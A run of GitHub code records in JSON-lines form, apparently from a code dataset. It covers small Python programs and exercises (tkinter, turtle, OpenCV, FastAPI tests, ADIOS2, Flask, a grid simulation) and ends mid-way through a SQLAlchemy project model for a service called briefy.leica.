city1_var.get()\n city2 = city2_var.get()\n\n if city1 and city2:\n coords1 = (cities[city1][\"lat\"], cities[city1][\"lng\"])\n coords2 = (cities[city2][\"lat\"], cities[city2][\"lng\"])\n\n dist = geodesic(coords1, coords2).kilometers\n label.config(text=f\"Distance : {int(dist)}kms\")\n\n city1_var.trace('w', on_city_update)\n city2_var.trace('w', on_city_update)\n\n exit_button = tk.Button(root, text=\"Quitter\", command=root.destroy)\n exit_button.pack()\n","repo_name":"ctrl-plus-w/esaip-project-villes","sub_path":"src/utils/windows.py","file_name":"windows.py","file_ext":"py","file_size_in_byte":3460,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13372380911","text":"import turtle\nimport colorsys\n\ndef estrella(tamano):\n for x in range(5):\n turtle.fd(tamano)\n turtle.rt(144)\n\nturtle.speed(0)\nturtle.pensize(2.5)\n\nfor a in range(1, 10000000, 15):\n color = colorsys.hsv_to_rgb(a / 101, 1.0, 1.0)\n turtle.pencolor(color)\n estrella(a)\n turtle.lt(15)\nturtle.done()\n","repo_name":"ogarnica/Compumaticas","sub_path":"estrella.py","file_name":"estrella.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33258440002","text":"import pytest\nfrom fastapi.testclient import TestClient\nfrom main import app\n\nclient = TestClient(app)\n\n\nclass TestCase:\n\n @pytest.mark.parametrize('token_id', [\"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjozfQ.mUnSxfiXA4zkxTrIVT3l2FRBMfTcHTLOd5oVHDaKnWo\"])\n def test_retrieve_wishlist_for_a_user(self, token_id):\n \"\"\"\n desc: test case for retrieval of all books in wishlist for a users.\n \"\"\"\n response = client.get(\"/wishlist/\", headers={'token': token_id})\n json_response = response.json()\n assert json_response[\"message\"] == \"Successfully Get A Wishlist\"\n\n @pytest.mark.parametrize('token_id', [\"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjo1fQ.K4UUqOCE7e7M4yo9LTs2gUaJURg-8DAajx95oj-QIgQ\"])\n def test_retrieve_users_detail_if_users_not_exist(self, token_id):\n \"\"\"\n desc: test case for retrieval of all books from wishlist for a user from database, but id doesn't exist, so it will raise exception\n \"\"\"\n response = client.get(\"/wishlist/\", headers={'token': token_id})\n json_response = response.json()\n assert json_response[\"message\"] == \"Error : There is no result for the Wishlist.\"\n\n @pytest.mark.parametrize('user_data, token_id', [({\"book_id\": 17}, \"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjozfQ.mUnSxfiXA4zkxTrIVT3l2FRBMfTcHTLOd5oVHDaKnWo\")])\n def test_if_user_added_to_db(self, user_data, token_id):\n response = client.post(\"/wishlist/\", json=user_data, headers={'token': token_id})\n assert response.json()[\"message\"] == \"Book Successfully Added To wishlist!!\"\n\n @pytest.mark.parametrize('book_id, token_id', [(7, \"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjozfQ.mUnSxfiXA4zkxTrIVT3l2FRBMfTcHTLOd5oVHDaKnWo\")])\n def test_if_user_is_deleted(self, book_id, token_id):\n response = client.delete(f\"/wishlist/{book_id}\", headers={'token': token_id})\n json_response = response.json()\n assert json_response[\"message\"] == \"Book Successfully Removed From wishlist!!\"\n","repo_name":"mukul-jain12/Book_Store_APP","sub_path":"tests/test_wishlist_apis.py","file_name":"test_wishlist_apis.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28151394300","text":"import cv2\nfaceCascade = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\nvideoCapture = cv2.VideoCapture(0)\n\nwhile True:\n #Yuz Tanimlama Kismi\n ret, frame =videoCapture.read()\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n faces = faceCascade.detectMultiScale(gray, scaleFactor=1.1, minNeighbors=5, minSize=(30, 30), flags=cv2.CASCADE_SCALE_IMAGE)\n\n #Etraftaki Diktortgeni Olusturualim\n\n for (x, y, w, h) in faces:\n cv2.rectangle(frame, (x, y), (x+w, y+h), (255, 255, 0), 2)#sondaki deger kalinligi onun bir solundaki ise rengi belirler.\n cv2.imshow('Video', frame)\n\n #uygulamadan cikmak icin q tusunu kullanalim\n if(cv2.waitKey(1) & 0XFF == ord('q')):\n break\n\nvideoCapture.release()\ncv2.destroyAllWindow()\n","repo_name":"Arda1999/FaceDetector","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30467858215","text":"#!/usr/bin/env python\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n\n\"\"\"\nExample:\n\n$ mpirun -n P python ./heat_transfer.py N M bpfile varname [varname [...]]\n\"\"\"\n\nimport adios2\nimport argparse\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport decomp\n\n\ndef SetupArgs():\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--infile\", \"-f\", help=\"Name of the bp file\", required=True)\n parser.add_argument(\"--outfile\", \"-o\", help=\"Name of the output bp file\", required=True)\n# parser.add_argument(\"--xmlfile\", \"-x\", help=\"Name of the XML confgi file\", required=True)\n\n parser.add_argument(\"--varname\", \"-v\", help=\"Name of variable read\", default=\"T\")\n\n parser.add_argument(\"--nx\", '-nx', help=\"Number of reading process in X dimension\", type=int, default=1)\n parser.add_argument(\"--ny\", '-ny', help=\"Number of reading process in Y dimension\", type=int, default=1)\n\n parser.add_argument(\"--nompi\", \"-nompi\", help=\"ADIOS was installed without MPI\", action=\"store_true\")\n parser.add_argument(\"--plot\", \"-p\", help=\"Make a plot of the input data\", action=\"store_true\")\n\n args = parser.parse_args()\n return args\n\n\n\ndef Plot2D(args, fr, fullshape, step, fontsize, displaysec):\n data = fr.read(args.varname, [0, 0], fullshape, step, 1)\n gs = gridspec.GridSpec(1, 1)\n fig = plt.figure(1, figsize=(8,10))\n ax = fig.add_subplot(gs[0, 0])\n\n print (\"data size:\", fullshape[0],\"x\",fullshape[1])\n print (data.shape)\n ax.imshow(data[0, :, :], origin='lower', extent=[0, fullshape[1], 0, fullshape[0]] )\n\n for i in range(args.ny):\n y = fullshape[0] / args.ny * i\n ax.plot([0, fullshape[1]], [y, y], color='black')\n\n for i in range(args.nx):\n x = fullshape[1] / args.nx * i\n ax.plot([x, x], [0, fullshape[0]], color='black')\n\n ax.set_title(\"Timestep = {0}\".format(step), fontsize=fontsize)\n for i in range(mpi.size):\n ax.text(Start[i][1], Start[i][0], \"rank: {0}\".format(i), fontsize=fontsize)\n\n ax.set_xlabel(\"x\")\n ax.set_ylabel(\"y\")\n\n plt.ion()\n plt.show()\n plt.pause(displaysec)\n plt.clf()\n\n\nif __name__ == \"__main__\":\n\n # fontsize on plot\n fontsize = 22\n displaysec = 0.5\n\n # Parse command line arguments\n args = SetupArgs()\n\n # Setup up 2D communicators if MPI is installed\n mpi = decomp.MPISetup(args)\n\n\n # Read the data from this object\n fr = adios2.open(args.infile, \"r\", mpi.comm_world, \"adios2.xml\", \"VizInput\")\n\n # Calculate difference between steps, and write to this object\n fw = adios2.open(args.outfile, \"w\", mpi.comm_world)\n\n\n # Get the ADIOS selections -- equally partition the data if parallelization is requested\n start, size, fullshape = mpi.Partition(fr, args)\n Start = mpi.comm_world.gather(start, root=0)\n\n\n # Read through the steps, one at a time\n step = 0\n while (not fr.eof()):\n data = fr.read(args.varname, start, size, endl=True)\n\n\n # Print a couple simple diagnostics\n avg = np.average(data)\n std = np.std(data)\n for i in range(mpi.size):\n mpi.comm_world.Barrier()\n if i == mpi.rank['world']:\n print(\"step:{0}, rank: {1}, avg: {2:.3f}, std: {3:.3f}\".format(step, mpi.rank['world'], avg, std))\n\n\n if (mpi.rank['world'] == 0) and (args.plot):\n Plot2D(args, fr, fullshape, step, fontsize, displaysec)\n\n\n if (step > 0):\n dt = data - olddata\n fw.write(\"d{0}\".format(args.varname), dt, fullshape, start, size, endl=True)\n olddata = np.copy(data)\n\n step += 1\n\n fr.close()\n fw.close()\n\n","repo_name":"pnorbert/adiosvm","sub_path":"Tutorial/heat2d/python/.obsolete/heat_all.py","file_name":"heat_all.py","file_ext":"py","file_size_in_byte":3686,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"40"} +{"seq_id":"20138139787","text":"# Python 3 code to find sum\n# of elements in given array\ndef _sum(arr):\n\t\n\t# initialize a variable\n\t# to store the sum\n\t# while iterating through\n\t# the array later\n\tsum=0\n\t\n\t# iterate through the array\n\t# and add each element to the sum variable\n\t# one at a time\n\tfor i in arr:\n\t\tsum = sum + i\n\t\t\n\treturn(sum)\n\n# driver function\narr=[]\n# input values to list\narr = [12, 3, 4, 15]\n\n# calculating length of array\nn = len(arr)\n\nans = _sum(arr)\n\n# display sum\nprint ('Sum of the array is ', ans)\n\n","repo_name":"Sangwan5688/Hacktoberfest2021","sub_path":"Python/sum_of_array.py","file_name":"sum_of_array.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":288,"dataset":"github-code","pt":"40"} +{"seq_id":"73495744760","text":"import time\n\n\ndef fibonacci(n):\n if n == 0:\n return 0\n if n == 1:\n return 1\n return fibonacci(n - 1) + fibonacci(n - 2)\n\n\ndef main():\n while True:\n print('\\n' + '='*60)\n n = int(input('Quantos elementos da série de Fibonacci deseja imprimir? '))\n\n t_inicio = time.time()\n\n for i in range(1, n + 1):\n print(fibonacci(i), end=' ')\n\n t_fim = time.time()\n\n t_total = t_fim - t_inicio\n print('\\nTempo de execução (em segundos): {}'.format(t_total))\n\n\nmain()\n","repo_name":"emersondevelops/exercicios-cc-unipe","sub_path":"estrutura-de-dados-ii/recursividade/serie-de-fibonacci-recursiva.py","file_name":"serie-de-fibonacci-recursiva.py","file_ext":"py","file_size_in_byte":542,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42310171575","text":"import numpy as np\n\n\ndef matrix_product(a, b):\n return np.matmul(a, b)\n\ndef rand_matrix():\n ti1 = []\n ti2 = []\n for i in range(0,8):\n tj1 = []\n tj2 = []\n for j in range(0, 8):\n tj1.append(np.random.randint(0, 5))\n tj2.append(np.random.randint(0, 5))\n ti1.append(tj1)\n ti2.append(tj2)\n\n return ti1, ti2\n\ndef main():\n a, b = rand_matrix()\n c = matrix_product(b, a)\n print(a)\n print(b)\n print(\"=\")\n print(c)\n\nif __name__ == '__main__':\n main()","repo_name":"KrzysztofKumka/PwJS_PythonExercises","sub_path":"Calculations and algotithms/matrix_multiplication.py","file_name":"matrix_multiplication.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23572443956","text":"from flask import Flask\n\nfrom flask.ext.script import Manager\nfrom flask.ext.login import LoginManager\nfrom flask.ext.security import Security, SQLAlchemyUserDatastore\nfrom flask.ext.assets import Environment, Bundle\n\n#from bounty.settings import DEBUG, SECRET_KEY\nfrom bounty.moment_js import moment_js\n\napp = Flask(__name__)\napp.config.from_object('bounty.settings')\n#app.debug = DEBUG\n#app.secret_key = SECRET_KEY\n\nmanager = Manager(app)\n\napp.jinja_env.globals['moment_js'] = moment_js\n\nlm = LoginManager()\nlm.setup_app(app)\nlm.login_view = 'user.login'\nlm.session_protection = \"strong\"\n\nfrom bounty.models import *\n\nfrom bounty.views import admin, base, fundraisers, users\n\napp.register_blueprint(fundraisers.fundraiser_bp, url_prefix='/')\napp.register_blueprint(admin.admin_bp, url_prefix='/admin')\napp.register_blueprint(users.user_bp, url_prefix='/user')\n\nuser_datastore = SQLAlchemyUserDatastore(db, User, Role)\nsecurity = Security(app, user_datastore)\n\nassets = Environment(app)\n\ncss = Bundle('css/bootstrap.min.css',\n 'css/bootstrap-responsive.css',\n 'css/bootstrap-datetimepicker.min.css',\n 'css/bounty.css')\nassets.register('css_all', css)\n\njs = Bundle('js/vendor/jquery-1.9.1.min.js',\n 'js/vendor/bootstrap.min.js',\n 'js/vendor/bootstrap-datetimepicker.min.js',\n 'js/vendor/modernizr-2.6.2-respond-1.1.0.min.js',\n 'js/bounty.js')\nassets.register('js_all', js)\n\nfav_icon = Bundle('img/favicon.ico')\nassets.register('fav_icon', fav_icon)\n","repo_name":"ardinor/bounty","sub_path":"bounty/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18900347109","text":"import requests\n\n# PARTE 1: HABILIDADES DE POKEMON\n\n# Lista de pokemones\npokemones = [\"ditto\", \"pikachu\", \"charmander\", \"bulbasaur\", \"squirtle\"]\n\n# Recorrer cada pokemon\nfor pokemon in pokemones:\n\n # Obtener enlace para extraer la información\n url = f\"https://pokeapi.co/api/v2/pokemon/{pokemon}\"\n \n # Solicitard atos y convertirlos a json\n res = requests.get (url)\n json_data = res.json()\n \n # Obtener y mostrar la primer habilidad de cada pokemon\n habilidad = json_data[\"abilities\"][1][\"ability\"][\"name\"]\n\n print (f\"{pokemon}: {habilidad}\")\n\n# PARTE 2: POKEMONS DE UN COLOR\n\n# Obtener la lista de pokemons de un color en específico\ncolor = \"green\"\nurl = f\"https://pokeapi.co/api/v2/pokemon-color/{color}/\"\nres = requests.get (url)\njson_data = res.json()\npokemones = json_data[\"pokemon_species\"]\n\n# Recorrer cada pokemon de la lista\nfor pokemon in pokemones:\n \n # Obtener nombre y url del pokemon\n pokemon_nombre = pokemon[\"name\"]\n pokemon_url = pokemon[\"url\"]\n \n # Solicitar informaicón detallada del pokemon\n pokemon_res = requests.get (pokemon_url)\n pokemon_json_data = pokemon_res.json()\n habitad_dic = pokemon_json_data[\"habitat\"]\n \n # Obtener el habitad o asignar un valor predeterminado si no existe\n if habitad_dic != None:\n habitad = habitad_dic[\"name\"]\n else:\n habitad = \"No tiene habitat\"\n \n # Mostrar información del habitad\n print (f\"{pokemon_nombre}: {habitad}\")\n \n \n ","repo_name":"darideveloper/cursos-y-clases","sub_path":"Ernesto/clase_8/21_request.py","file_name":"21_request.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"es","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"7099201375","text":"import argparse\nimport random\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--num_examples', type=int, required=True)\n parser.add_argument('--words_path', type=str, default=\"data/finetune_x.txt\")\n parser.add_argument('--save_path', type=str, required=True)\n args = parser.parse_args()\n words = set()\n with open(args.words_path, 'r') as f:\n for line in f:\n for word in line.split():\n words.add(word)\n with open(args.save_path, 'w') as f:\n for i in range(args.num_examples):\n for j in range(4):\n hm = random.randint(1, 2)\n sample = random.sample(sorted(words), hm)\n line = \" \".join(sample) + \"\\n\"\n f.write(line)\n f.write(\"\\n\")\n\n\n ","repo_name":"dmkwis/POLTORA-TALERZA","sub_path":"prompt_generator.py","file_name":"prompt_generator.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25312914306","text":"# 틀렸음\nm,s=map(int, input().split(' '))\n\n# x,y,d\nfish=[list(map(int, input().split(' '))) for _ in range(m)]\n# dummy (행렬상 좌표 주의)\ndirections=[(),(0,-1),(-1,-1),(-1,0),(-1,1),(0,1),(1,1),(1,0),(1,-1)]\n\n# 상어 위치\nsx, sy=map(int, input().split(' '))\n\n# 격자 칸의 상황(dummy 포함)\n# 냄새 -> 2\narea=[[0]*5 for _ in range(5)]\n\n# 물고기 냄새를 남길 좌표 저장\ndelete_fish = []\n\ndef move_fish():\n global fish, area\n\n new_fish=[]\n while fish:\n x,y,d=fish.pop(0)\n # d에서 0까지 탐색(반시계 회전 인 것 주의!)\n for i in range(d,0,-1):\n dx=x+directions[i][0]\n dy=y+directions[i][1]\n # 격자 범위 안에 해당하면서 상어가 존재하거나 물고기 냄새가 존재하는 경우가 아니면 이동 가능\n if 1<=dx<=4 and 1<=dy<=4 and area[dx][dy]==0 and (dx!=sx or dy!=sy):\n new_fish.append([dx,dy,i])\n break\n # 위 for문에서 가능한 칸이 없을 경우, 끝에서 d까지 인덱스 탐색\n else:\n for i in range(8,d,-1):\n dx = x + directions[i][0]\n dy = y + directions[i][1]\n if 1 <= dx <= 4 and 1 <= dy <= 4 and area[dx][dy] == 0:\n new_fish.append([dx, dy, i])\n break\n # 모두 해당하지 않으면 기존 위치와 방향 다시 넣어줌\n else:\n new_fish.append([x,y,d])\n # fish 배열 update\n fish=[arr[:] for arr in new_fish]\n # 위치별 물고기 수 저장\n numberoffish = [[0] * 5 for _ in range(5)]\n for x,y,d in fish:\n numberoffish[x][y]+=1\n\n return numberoffish\n\n\n\ndef move_shark():\n global area, fish, nf, sy, sx, step, delete_fish\n # 인접한 상하좌우 칸으로 이동\n # 상 좌 하 우(x,y) 행 열로 생각\n direction=[(),(-1,0),(0,-1),(1,0),(0,1)]\n fishmax=-1e9\n dictmin=1e9\n # 상어가 이동할 최종 좌표\n change_x=sx\n change_y=sy\n # 3중 for문으로 각 단게를 거치면서 총 물고기 수를 파악하고, 사전순도 체크\n for one in range(1,5):\n for two in range(1,5):\n for three in range(1,5):\n new_x=sx\n new_y=sy\n numfish=0\n move_dir=[one, two, three]\n visited=[[0]*5 for _ in range(5)]\n for m in move_dir:\n new_x=new_x+direction[m][0]\n new_y=new_y+direction[m][1]\n if 1<=new_x<=4 and 1<=new_y<=4:\n # 이동하는 칸에 물고기가 존재하면\n if nf[new_x][new_y]>0 and visited[new_x][new_y]==0:\n # 먹은 물고기 수 더해주고\n numfish+=nf[new_x][new_y]\n # 방문 표시\n visited[new_x][new_y] = 1\n else:\n # 범위을 벗어나면 해당 방법은 불가능한 것\n break\n # for문을 도는 동안 break되지 않으면? -> 가능한 경로라는 뜻 -> 최대 물고기 값인지 확인\n else:\n numdict = int(str(one) + str(two) + str(three))\n if fishmaxnumdict:\n dictmin=numdict\n change_y=new_y\n change_x=new_x\n # 최종적으로 정해진 dictmin으로 delete fish 저장\n t_sy=sy\n t_sx=sx\n for n in list(str(dictmin)):\n t_sx+=direction[int(n)][0]\n t_sy+=direction[int(n)][1]\n if nf[t_sx][t_sy]>0:\n delete_fish.append((t_sx,t_sy, step))\n # 상어 냄새 남기기\n area[sx][sy]=2\n # 상어 좌표 업데이트\n sy=change_y\n sx=change_x\n\n\n # delete_fish에 저장된 대로 해당 칸에 물고기 제거하고 냄새 남김\n for x,y,s in delete_fish:\n if s>step:\n break\n elif s==step:\n area[x][y]=2\n # 해당 칸 물고기 제거\n delelte_idx=[]\n for idx in range(len(fish)):\n if fish[idx][0]==x and fish[idx][1]==y:\n delelte_idx.append(idx)\n fish=[fish[i] for i in range(len(fish)) if i not in delelte_idx]\n\n\ndef delete_smell():\n global delete_fish, area, step\n for x,y,s in delete_fish:\n if s>(step-2):\n break\n elif s==(step-2):\n area[x][y]=0\n\n\n\n\n\nstep=1\nwhile step<=s:\n # 상어가 복제 마법을 걸어둠\n copy_fish=[arr[:] for arr in fish]\n # 물고기가 한 칸씩 이동하고, 각 위치별로 물고기의 수를 나타내는 이차원 배열 nf를 리턴\n nf=move_fish()\n # 상어가 연속해서 3칸을 이동함\n move_shark()\n # 두 번 전 연습에서 남긴 냄새는 삭제\n delete_smell()\n # 복제 마법 완료\n fish+=copy_fish\n step+=1\n\n# 격자에 존재하는 물고기의 수\nprint(len(fish))\n\n\n","repo_name":"hyunji-lee99/algorithm_study","sub_path":"baekjoon/Samsung SW/23290.py","file_name":"23290.py","file_ext":"py","file_size_in_byte":5265,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6120536487","text":"\"\"\"Briefy Leica Project model.\"\"\"\nfrom briefy.common.db.models import Item\nfrom briefy.common.utils import schema\nfrom briefy.common.utils.data import Objectify\nfrom briefy.common.vocabularies.categories import CategoryChoices\nfrom briefy.common.vocabularies.roles import Groups\nfrom briefy.leica.cache import cache_region\nfrom briefy.leica.cache import enable_cache\nfrom briefy.leica.models import mixins\nfrom briefy.leica.models.project import workflows\nfrom briefy.leica.utils.user import add_user_info_to_state_history\nfrom briefy.leica.vocabularies import AssetTypes\nfrom briefy.leica.vocabularies import OrderTypeChoices\nfrom briefy.leica.vocabularies import ProjectTypeChoices\nfrom briefy.ws.errors import ValidationError\nfrom sqlalchemy import event\nfrom sqlalchemy import orm\nfrom sqlalchemy.dialects.postgresql import JSONB\nfrom sqlalchemy.ext.hybrid import hybrid_property\nfrom zope.interface import implementer\nfrom zope.interface import Interface\n\nimport colander\nimport sqlalchemy as sa\nimport sqlalchemy_utils as sautils\nimport typing as t\n\n\n# TODO: improve this based on the project type\nDEFAULT_DELIVERY_CONFIG = {\n 'approve': {\n 'archive': {\n 'driver': 'gdrive',\n 'images': True,\n 'name': 'order.customer_order_id',\n 'other': True,\n 'parentId': None,\n 'resize': [],\n 'subfolders': True\n },\n 'delivery': {\n 'driver': 'gdrive',\n 'images': True,\n 'name': 'order.customer_order_id',\n 'other': False,\n 'parentId': None,\n 'resize': [],\n 'subfolders': False\n }\n }\n}\n\nDEFAULT_ADD_ORDER_ROLES = [\n 'g:customers',\n 'g:briefy_pm',\n]\n\n\nclass IProject(Interface):\n \"\"\"Marker interface for Project.\"\"\"\n\n\nclass CommercialInfoMixin(mixins.ProfessionalPayoutInfo, mixins.ProjectRolesMixin,\n mixins.OrderFinancialInfo):\n \"\"\"Commercial details about a project.\"\"\"\n\n contract = sa.Column(\n sautils.URLType,\n nullable=True,\n info={\n 'colanderalchemy': {\n 'title': 'Contract',\n 'validator': colander.url,\n 'missing': colander.drop,\n 'typ': colander.String\n }\n }\n )\n \"\"\"Path to contract.\"\"\"\n\n\n@implementer(IProject)\nclass Project(CommercialInfoMixin, mixins.ProjectRolesMixin,\n mixins.LeicaSubMixin, Item):\n \"\"\"A Project in Briefy.\"\"\"\n\n _workflow = workflows.ProjectWorkflow\n\n __summary_attributes__ = [\n 'id', 'title', 'description', 'created_at', 'updated_at',\n 'state', 'slug', 'asset_types', 'order_type', 'project_type'\n ]\n\n __summary_attributes_relations__ = ['customer', 'pool', 'customer_users']\n\n __listing_attributes__ = __summary_attributes__ + [\n 'total_orders', 'total_leadorders', 'customer', 'category', 'internal_pm'\n ]\n\n __exclude_attributes__ = ['orders', 'leadorders']\n\n __to_dict_additional_attributes__ = ['price', 'total_orders', 'total_leadorders']\n\n __raw_acl__ = (\n ('create', ('g:briefy_pm', 'g:briefy_bizdev', 'g:briefy_finance', 'g:system')),\n ('list', ('g:briefy_qa', 'g:briefy_bizdev',\n 'g:briefy_scout', 'g:briefy_finance', 'g:system')),\n ('view', ('g:briefy_qa', 'g:briefy_bizdev',\n 'g:briefy_scout', 'g:briefy_finance', 'g:system')),\n ('edit', ('g:briefy_pm', 'g:briefy_bizdev', 'g:briefy_finance', 'g:system')),\n ('delete', ('g:briefy_finance', 'g:system')),\n )\n\n __colanderalchemy_config__ = {\n 'excludes': [\n 'state_history', 'state', 'customer', 'pool',\n ],\n 'overrides': mixins.ProjectRolesMixin.__colanderalchemy_config__['overrides']\n }\n\n __parent_attr__ = 'customer_id'\n\n customer_id = sa.Column(sautils.UUIDType,\n sa.ForeignKey('customers.id'),\n index=True,\n nullable=False,\n info={'colanderalchemy': {\n 'title': 'Customer',\n 'validator': colander.uuid,\n 'typ': colander.String}}\n )\n \"\"\"Customer ID.\n\n Builds the relation with :class:`briefy.leica.models.customer.Customer`.\n \"\"\"\n\n customer_users = orm.relationship(\n 'CustomerUserProfile',\n primaryjoin='and_('\n 'foreign(CustomerUserProfile.customer_id)==Project.customer_id,'\n 'LocalRole.principal_id==foreign(CustomerUserProfile.id),'\n 'LocalRole.item_id==Project.id)',\n lazy='dynamic',\n info={\n 'colanderalchemy': {\n 'title': 'Customer User Profiles',\n 'missing': colander.drop,\n }\n }\n )\n \"\"\"List of customer user profiles connected to this project.\n\n Returns a collection of :class:`briefy.leica.models.user.CustomerUserProfile`.\n \"\"\"\n\n abstract = sa.Column(\n 'abstract',\n sa.Text,\n nullable=True,\n info={\n 'colanderalchemy': {\n 'title': 'Abstract',\n 'missing': colander.drop,\n 'typ': colander.String\n }\n }\n )\n \"\"\"Abstract for a project.\n\n Text field allowing a small, but meaningful description for an object.\n Used to store Bizdev comments.\n \"\"\"\n\n order_type = sa.Column(\n sautils.ChoiceType(OrderTypeChoices, impl=sa.String()),\n default='order',\n nullable=False,\n info={\n 'colanderalchemy': {\n 'title': 'Type of Order',\n 'missing': colander.drop,\n 'typ': colander.String\n }\n }\n )\n \"\"\"Type of order the project support.\"\"\"\n\n project_type = sa.Column(\n sautils.ChoiceType(ProjectTypeChoices, impl=sa.String()),\n default='on-demand',\n nullable=False,\n info={\n 'colanderalchemy': {\n 'title': 'Type of Project',\n 'missing': colander.drop,\n 'typ': colander.String\n }\n }\n )\n \"\"\"Type of package the project support.\"\"\"\n\n leadorder_confirmation_fields = sa.Column(\n JSONB,\n default=['availability'],\n nullable=True,\n info={\n 'colanderalchemy': {\n 'title': 'Fieldnames required to confirm a LeadOrder.',\n 'missing': colander.drop,\n 'typ': schema.List()\n }\n }\n )\n \"\"\"List with fieldnames required to confirm a LeadOrder.\"\"\"\n\n number_required_assets = sa.Column(sa.Integer(), default=10)\n \"\"\"Number of required assets of a Project to be used in the Order as default value.\"\"\"\n\n asset_types = sa.Column(\n JSONB,\n info={\n 'colanderalchemy': {\n 'title': 'Asset types.',\n 'missing': colander.drop,\n 'typ': schema.List()\n }\n }\n )\n \"\"\"Asset types supported by this project.\n\n Options come from :mod:`briefy.leica.vocabularies.AssetTypes`.\n \"\"\"\n\n @orm.validates('asset_types')\n def validate_asset_types(self, key, value):\n \"\"\"Validate if values for asset_types are correct.\"\"\"\n members = AssetTypes.__members__\n for item in value:\n if item not in members:\n raise ValidationError(message='Invalid type of asset', name=key)\n return value\n\n category = sa.Column(\n sautils.ChoiceType(CategoryChoices, impl=sa.String()),\n default='undefined',\n nullable=False\n )\n \"\"\"Category of this Project.\n\n Options come from :mod:`briefy.common.vocabularies.categories`.\n \"\"\"\n\n tech_requirements = sa.Column(\n JSONB,\n default=dict,\n info={\n 'colanderalchemy': {\n 'title': 'Technical Requirements for this project.',\n 'missing': colander.drop,\n 'typ': schema.JSONType\n }\n }\n )\n \"\"\"Technical requirements for orders in this project.\n\n It stores a dictionary of requirements to be fulfilled by each asset of each Assignment.\n\n i.e. - for a project delivering only photos, its value might be::\n\n [\n {\n \"asset_type\": \"Image\",\n \"set\": {\n \"minimum_number\": 10 # (aliased to 'minimum_number_of_photos' (deprecated))\n },\n \"asset\": {\n \"dimensions\": [\n {\n \"value\": \"4000x3000\",\n \"operator\": \"min\"\n }\n ],\n \"orientation\": [\n {\n \"value\": \"landscape\",\n \"operator\": \"eq\"\n }\n ]\n }\n },\n {\n \"asset_type\": \"Video\",\n \"set\": {\n \"minimum_number\": 2\n },\n \"asset\": {\n \"duration\": {\"value\": \"30\", \"operator\" :\"min\"}\n },\n \"actions\": [\n {\n \"state\": \"post_processing\",\n \"action\": \"copy\",\n \"settings\": {\n \"driver\": \"gdrive\",\n \"parentId\": \"\",\n \"subfolders\": true,\n \"images\": true,\n \"other\": true,\n \"name\": \"order.customer_order_id\",\n \"resize\": []\n }\n },\n ...\n ]\n },\n ...\n ]\n\n\n If there is a single asset type for the project, the outermost list may be omitted -\n and a single copy of the inner dictionary is used. The inner dictionary should\n have the keys \"asset_type\", \"set\" for validation constraints that apply to\n all assets of that type taken together,\n and \"asset\" for denoting constraints for each asset of that type.\n\n (Deprecated: for compatibility reasons, ms.laure code will understand a\n missing \"asset_type\" key will default it to \"Image\".)\n \"\"\"\n\n delivery = sa.Column(\n JSONB,\n default=DEFAULT_DELIVERY_CONFIG,\n info={\n 'colanderalchemy': {\n 'title': 'Delivery information for this project.',\n 'missing': colander.drop,\n 'typ': schema.JSONType\n }\n }\n )\n \"\"\"Delivery configuration for orders in this project.\n\n It stores a dictionary of configurations to be used by the delivery mechanism.\n\n i.e::\n\n {\n \"approve\": {\n \"archive\": {\n \"driver\": \"gdrive\",\n \"parentId\": \"\",\n \"subfolders\": true,\n \"images\": true,\n \"other\": true,\n \"name\": \"order.customer_order_id\",\n \"resize\": []\n },\n \"gdrive\": {\n \"driver\": \"gdrive\",\n \"parentId\": \"\",\n \"subfolders\": false,\n \"images\": true,\n \"other\": false,\n \"name\": \"order.customer_order_id\",\n \"resize\": []\n },\n },\n \"accept\": {\n \"sftp\": {\n \"driver\": \"sftp\",\n \"subfolders\": false,\n \"images\": true,\n \"other\": false,\n \"name\": \"order.customer_order_id\",\n \"resize\": [\n {\"name\": \"resized\", \"filter\": \"maxbytes\": 4000000}\n ]\n }\n }\n }\n\n \"\"\"\n\n cancellation_window = sa.Column(sa.Integer, default=1)\n \"\"\"Period, in hours, before the shooting, an Assignment can be cancelled.\n\n i.e.: 24 would mean an Assignment in this project could be cancelled with\n at least 24 hour notice. Zero means no cancellation is possible.\n \"\"\"\n\n availability_window = sa.Column(sa.Integer, default=6)\n \"\"\"Period, in days, an availability date can be inputed.\n\n i.e.: 6 would mean an Order would have availability dates for, at least, 6 days in the future.\n Zero means no check is done.\n \"\"\"\n\n 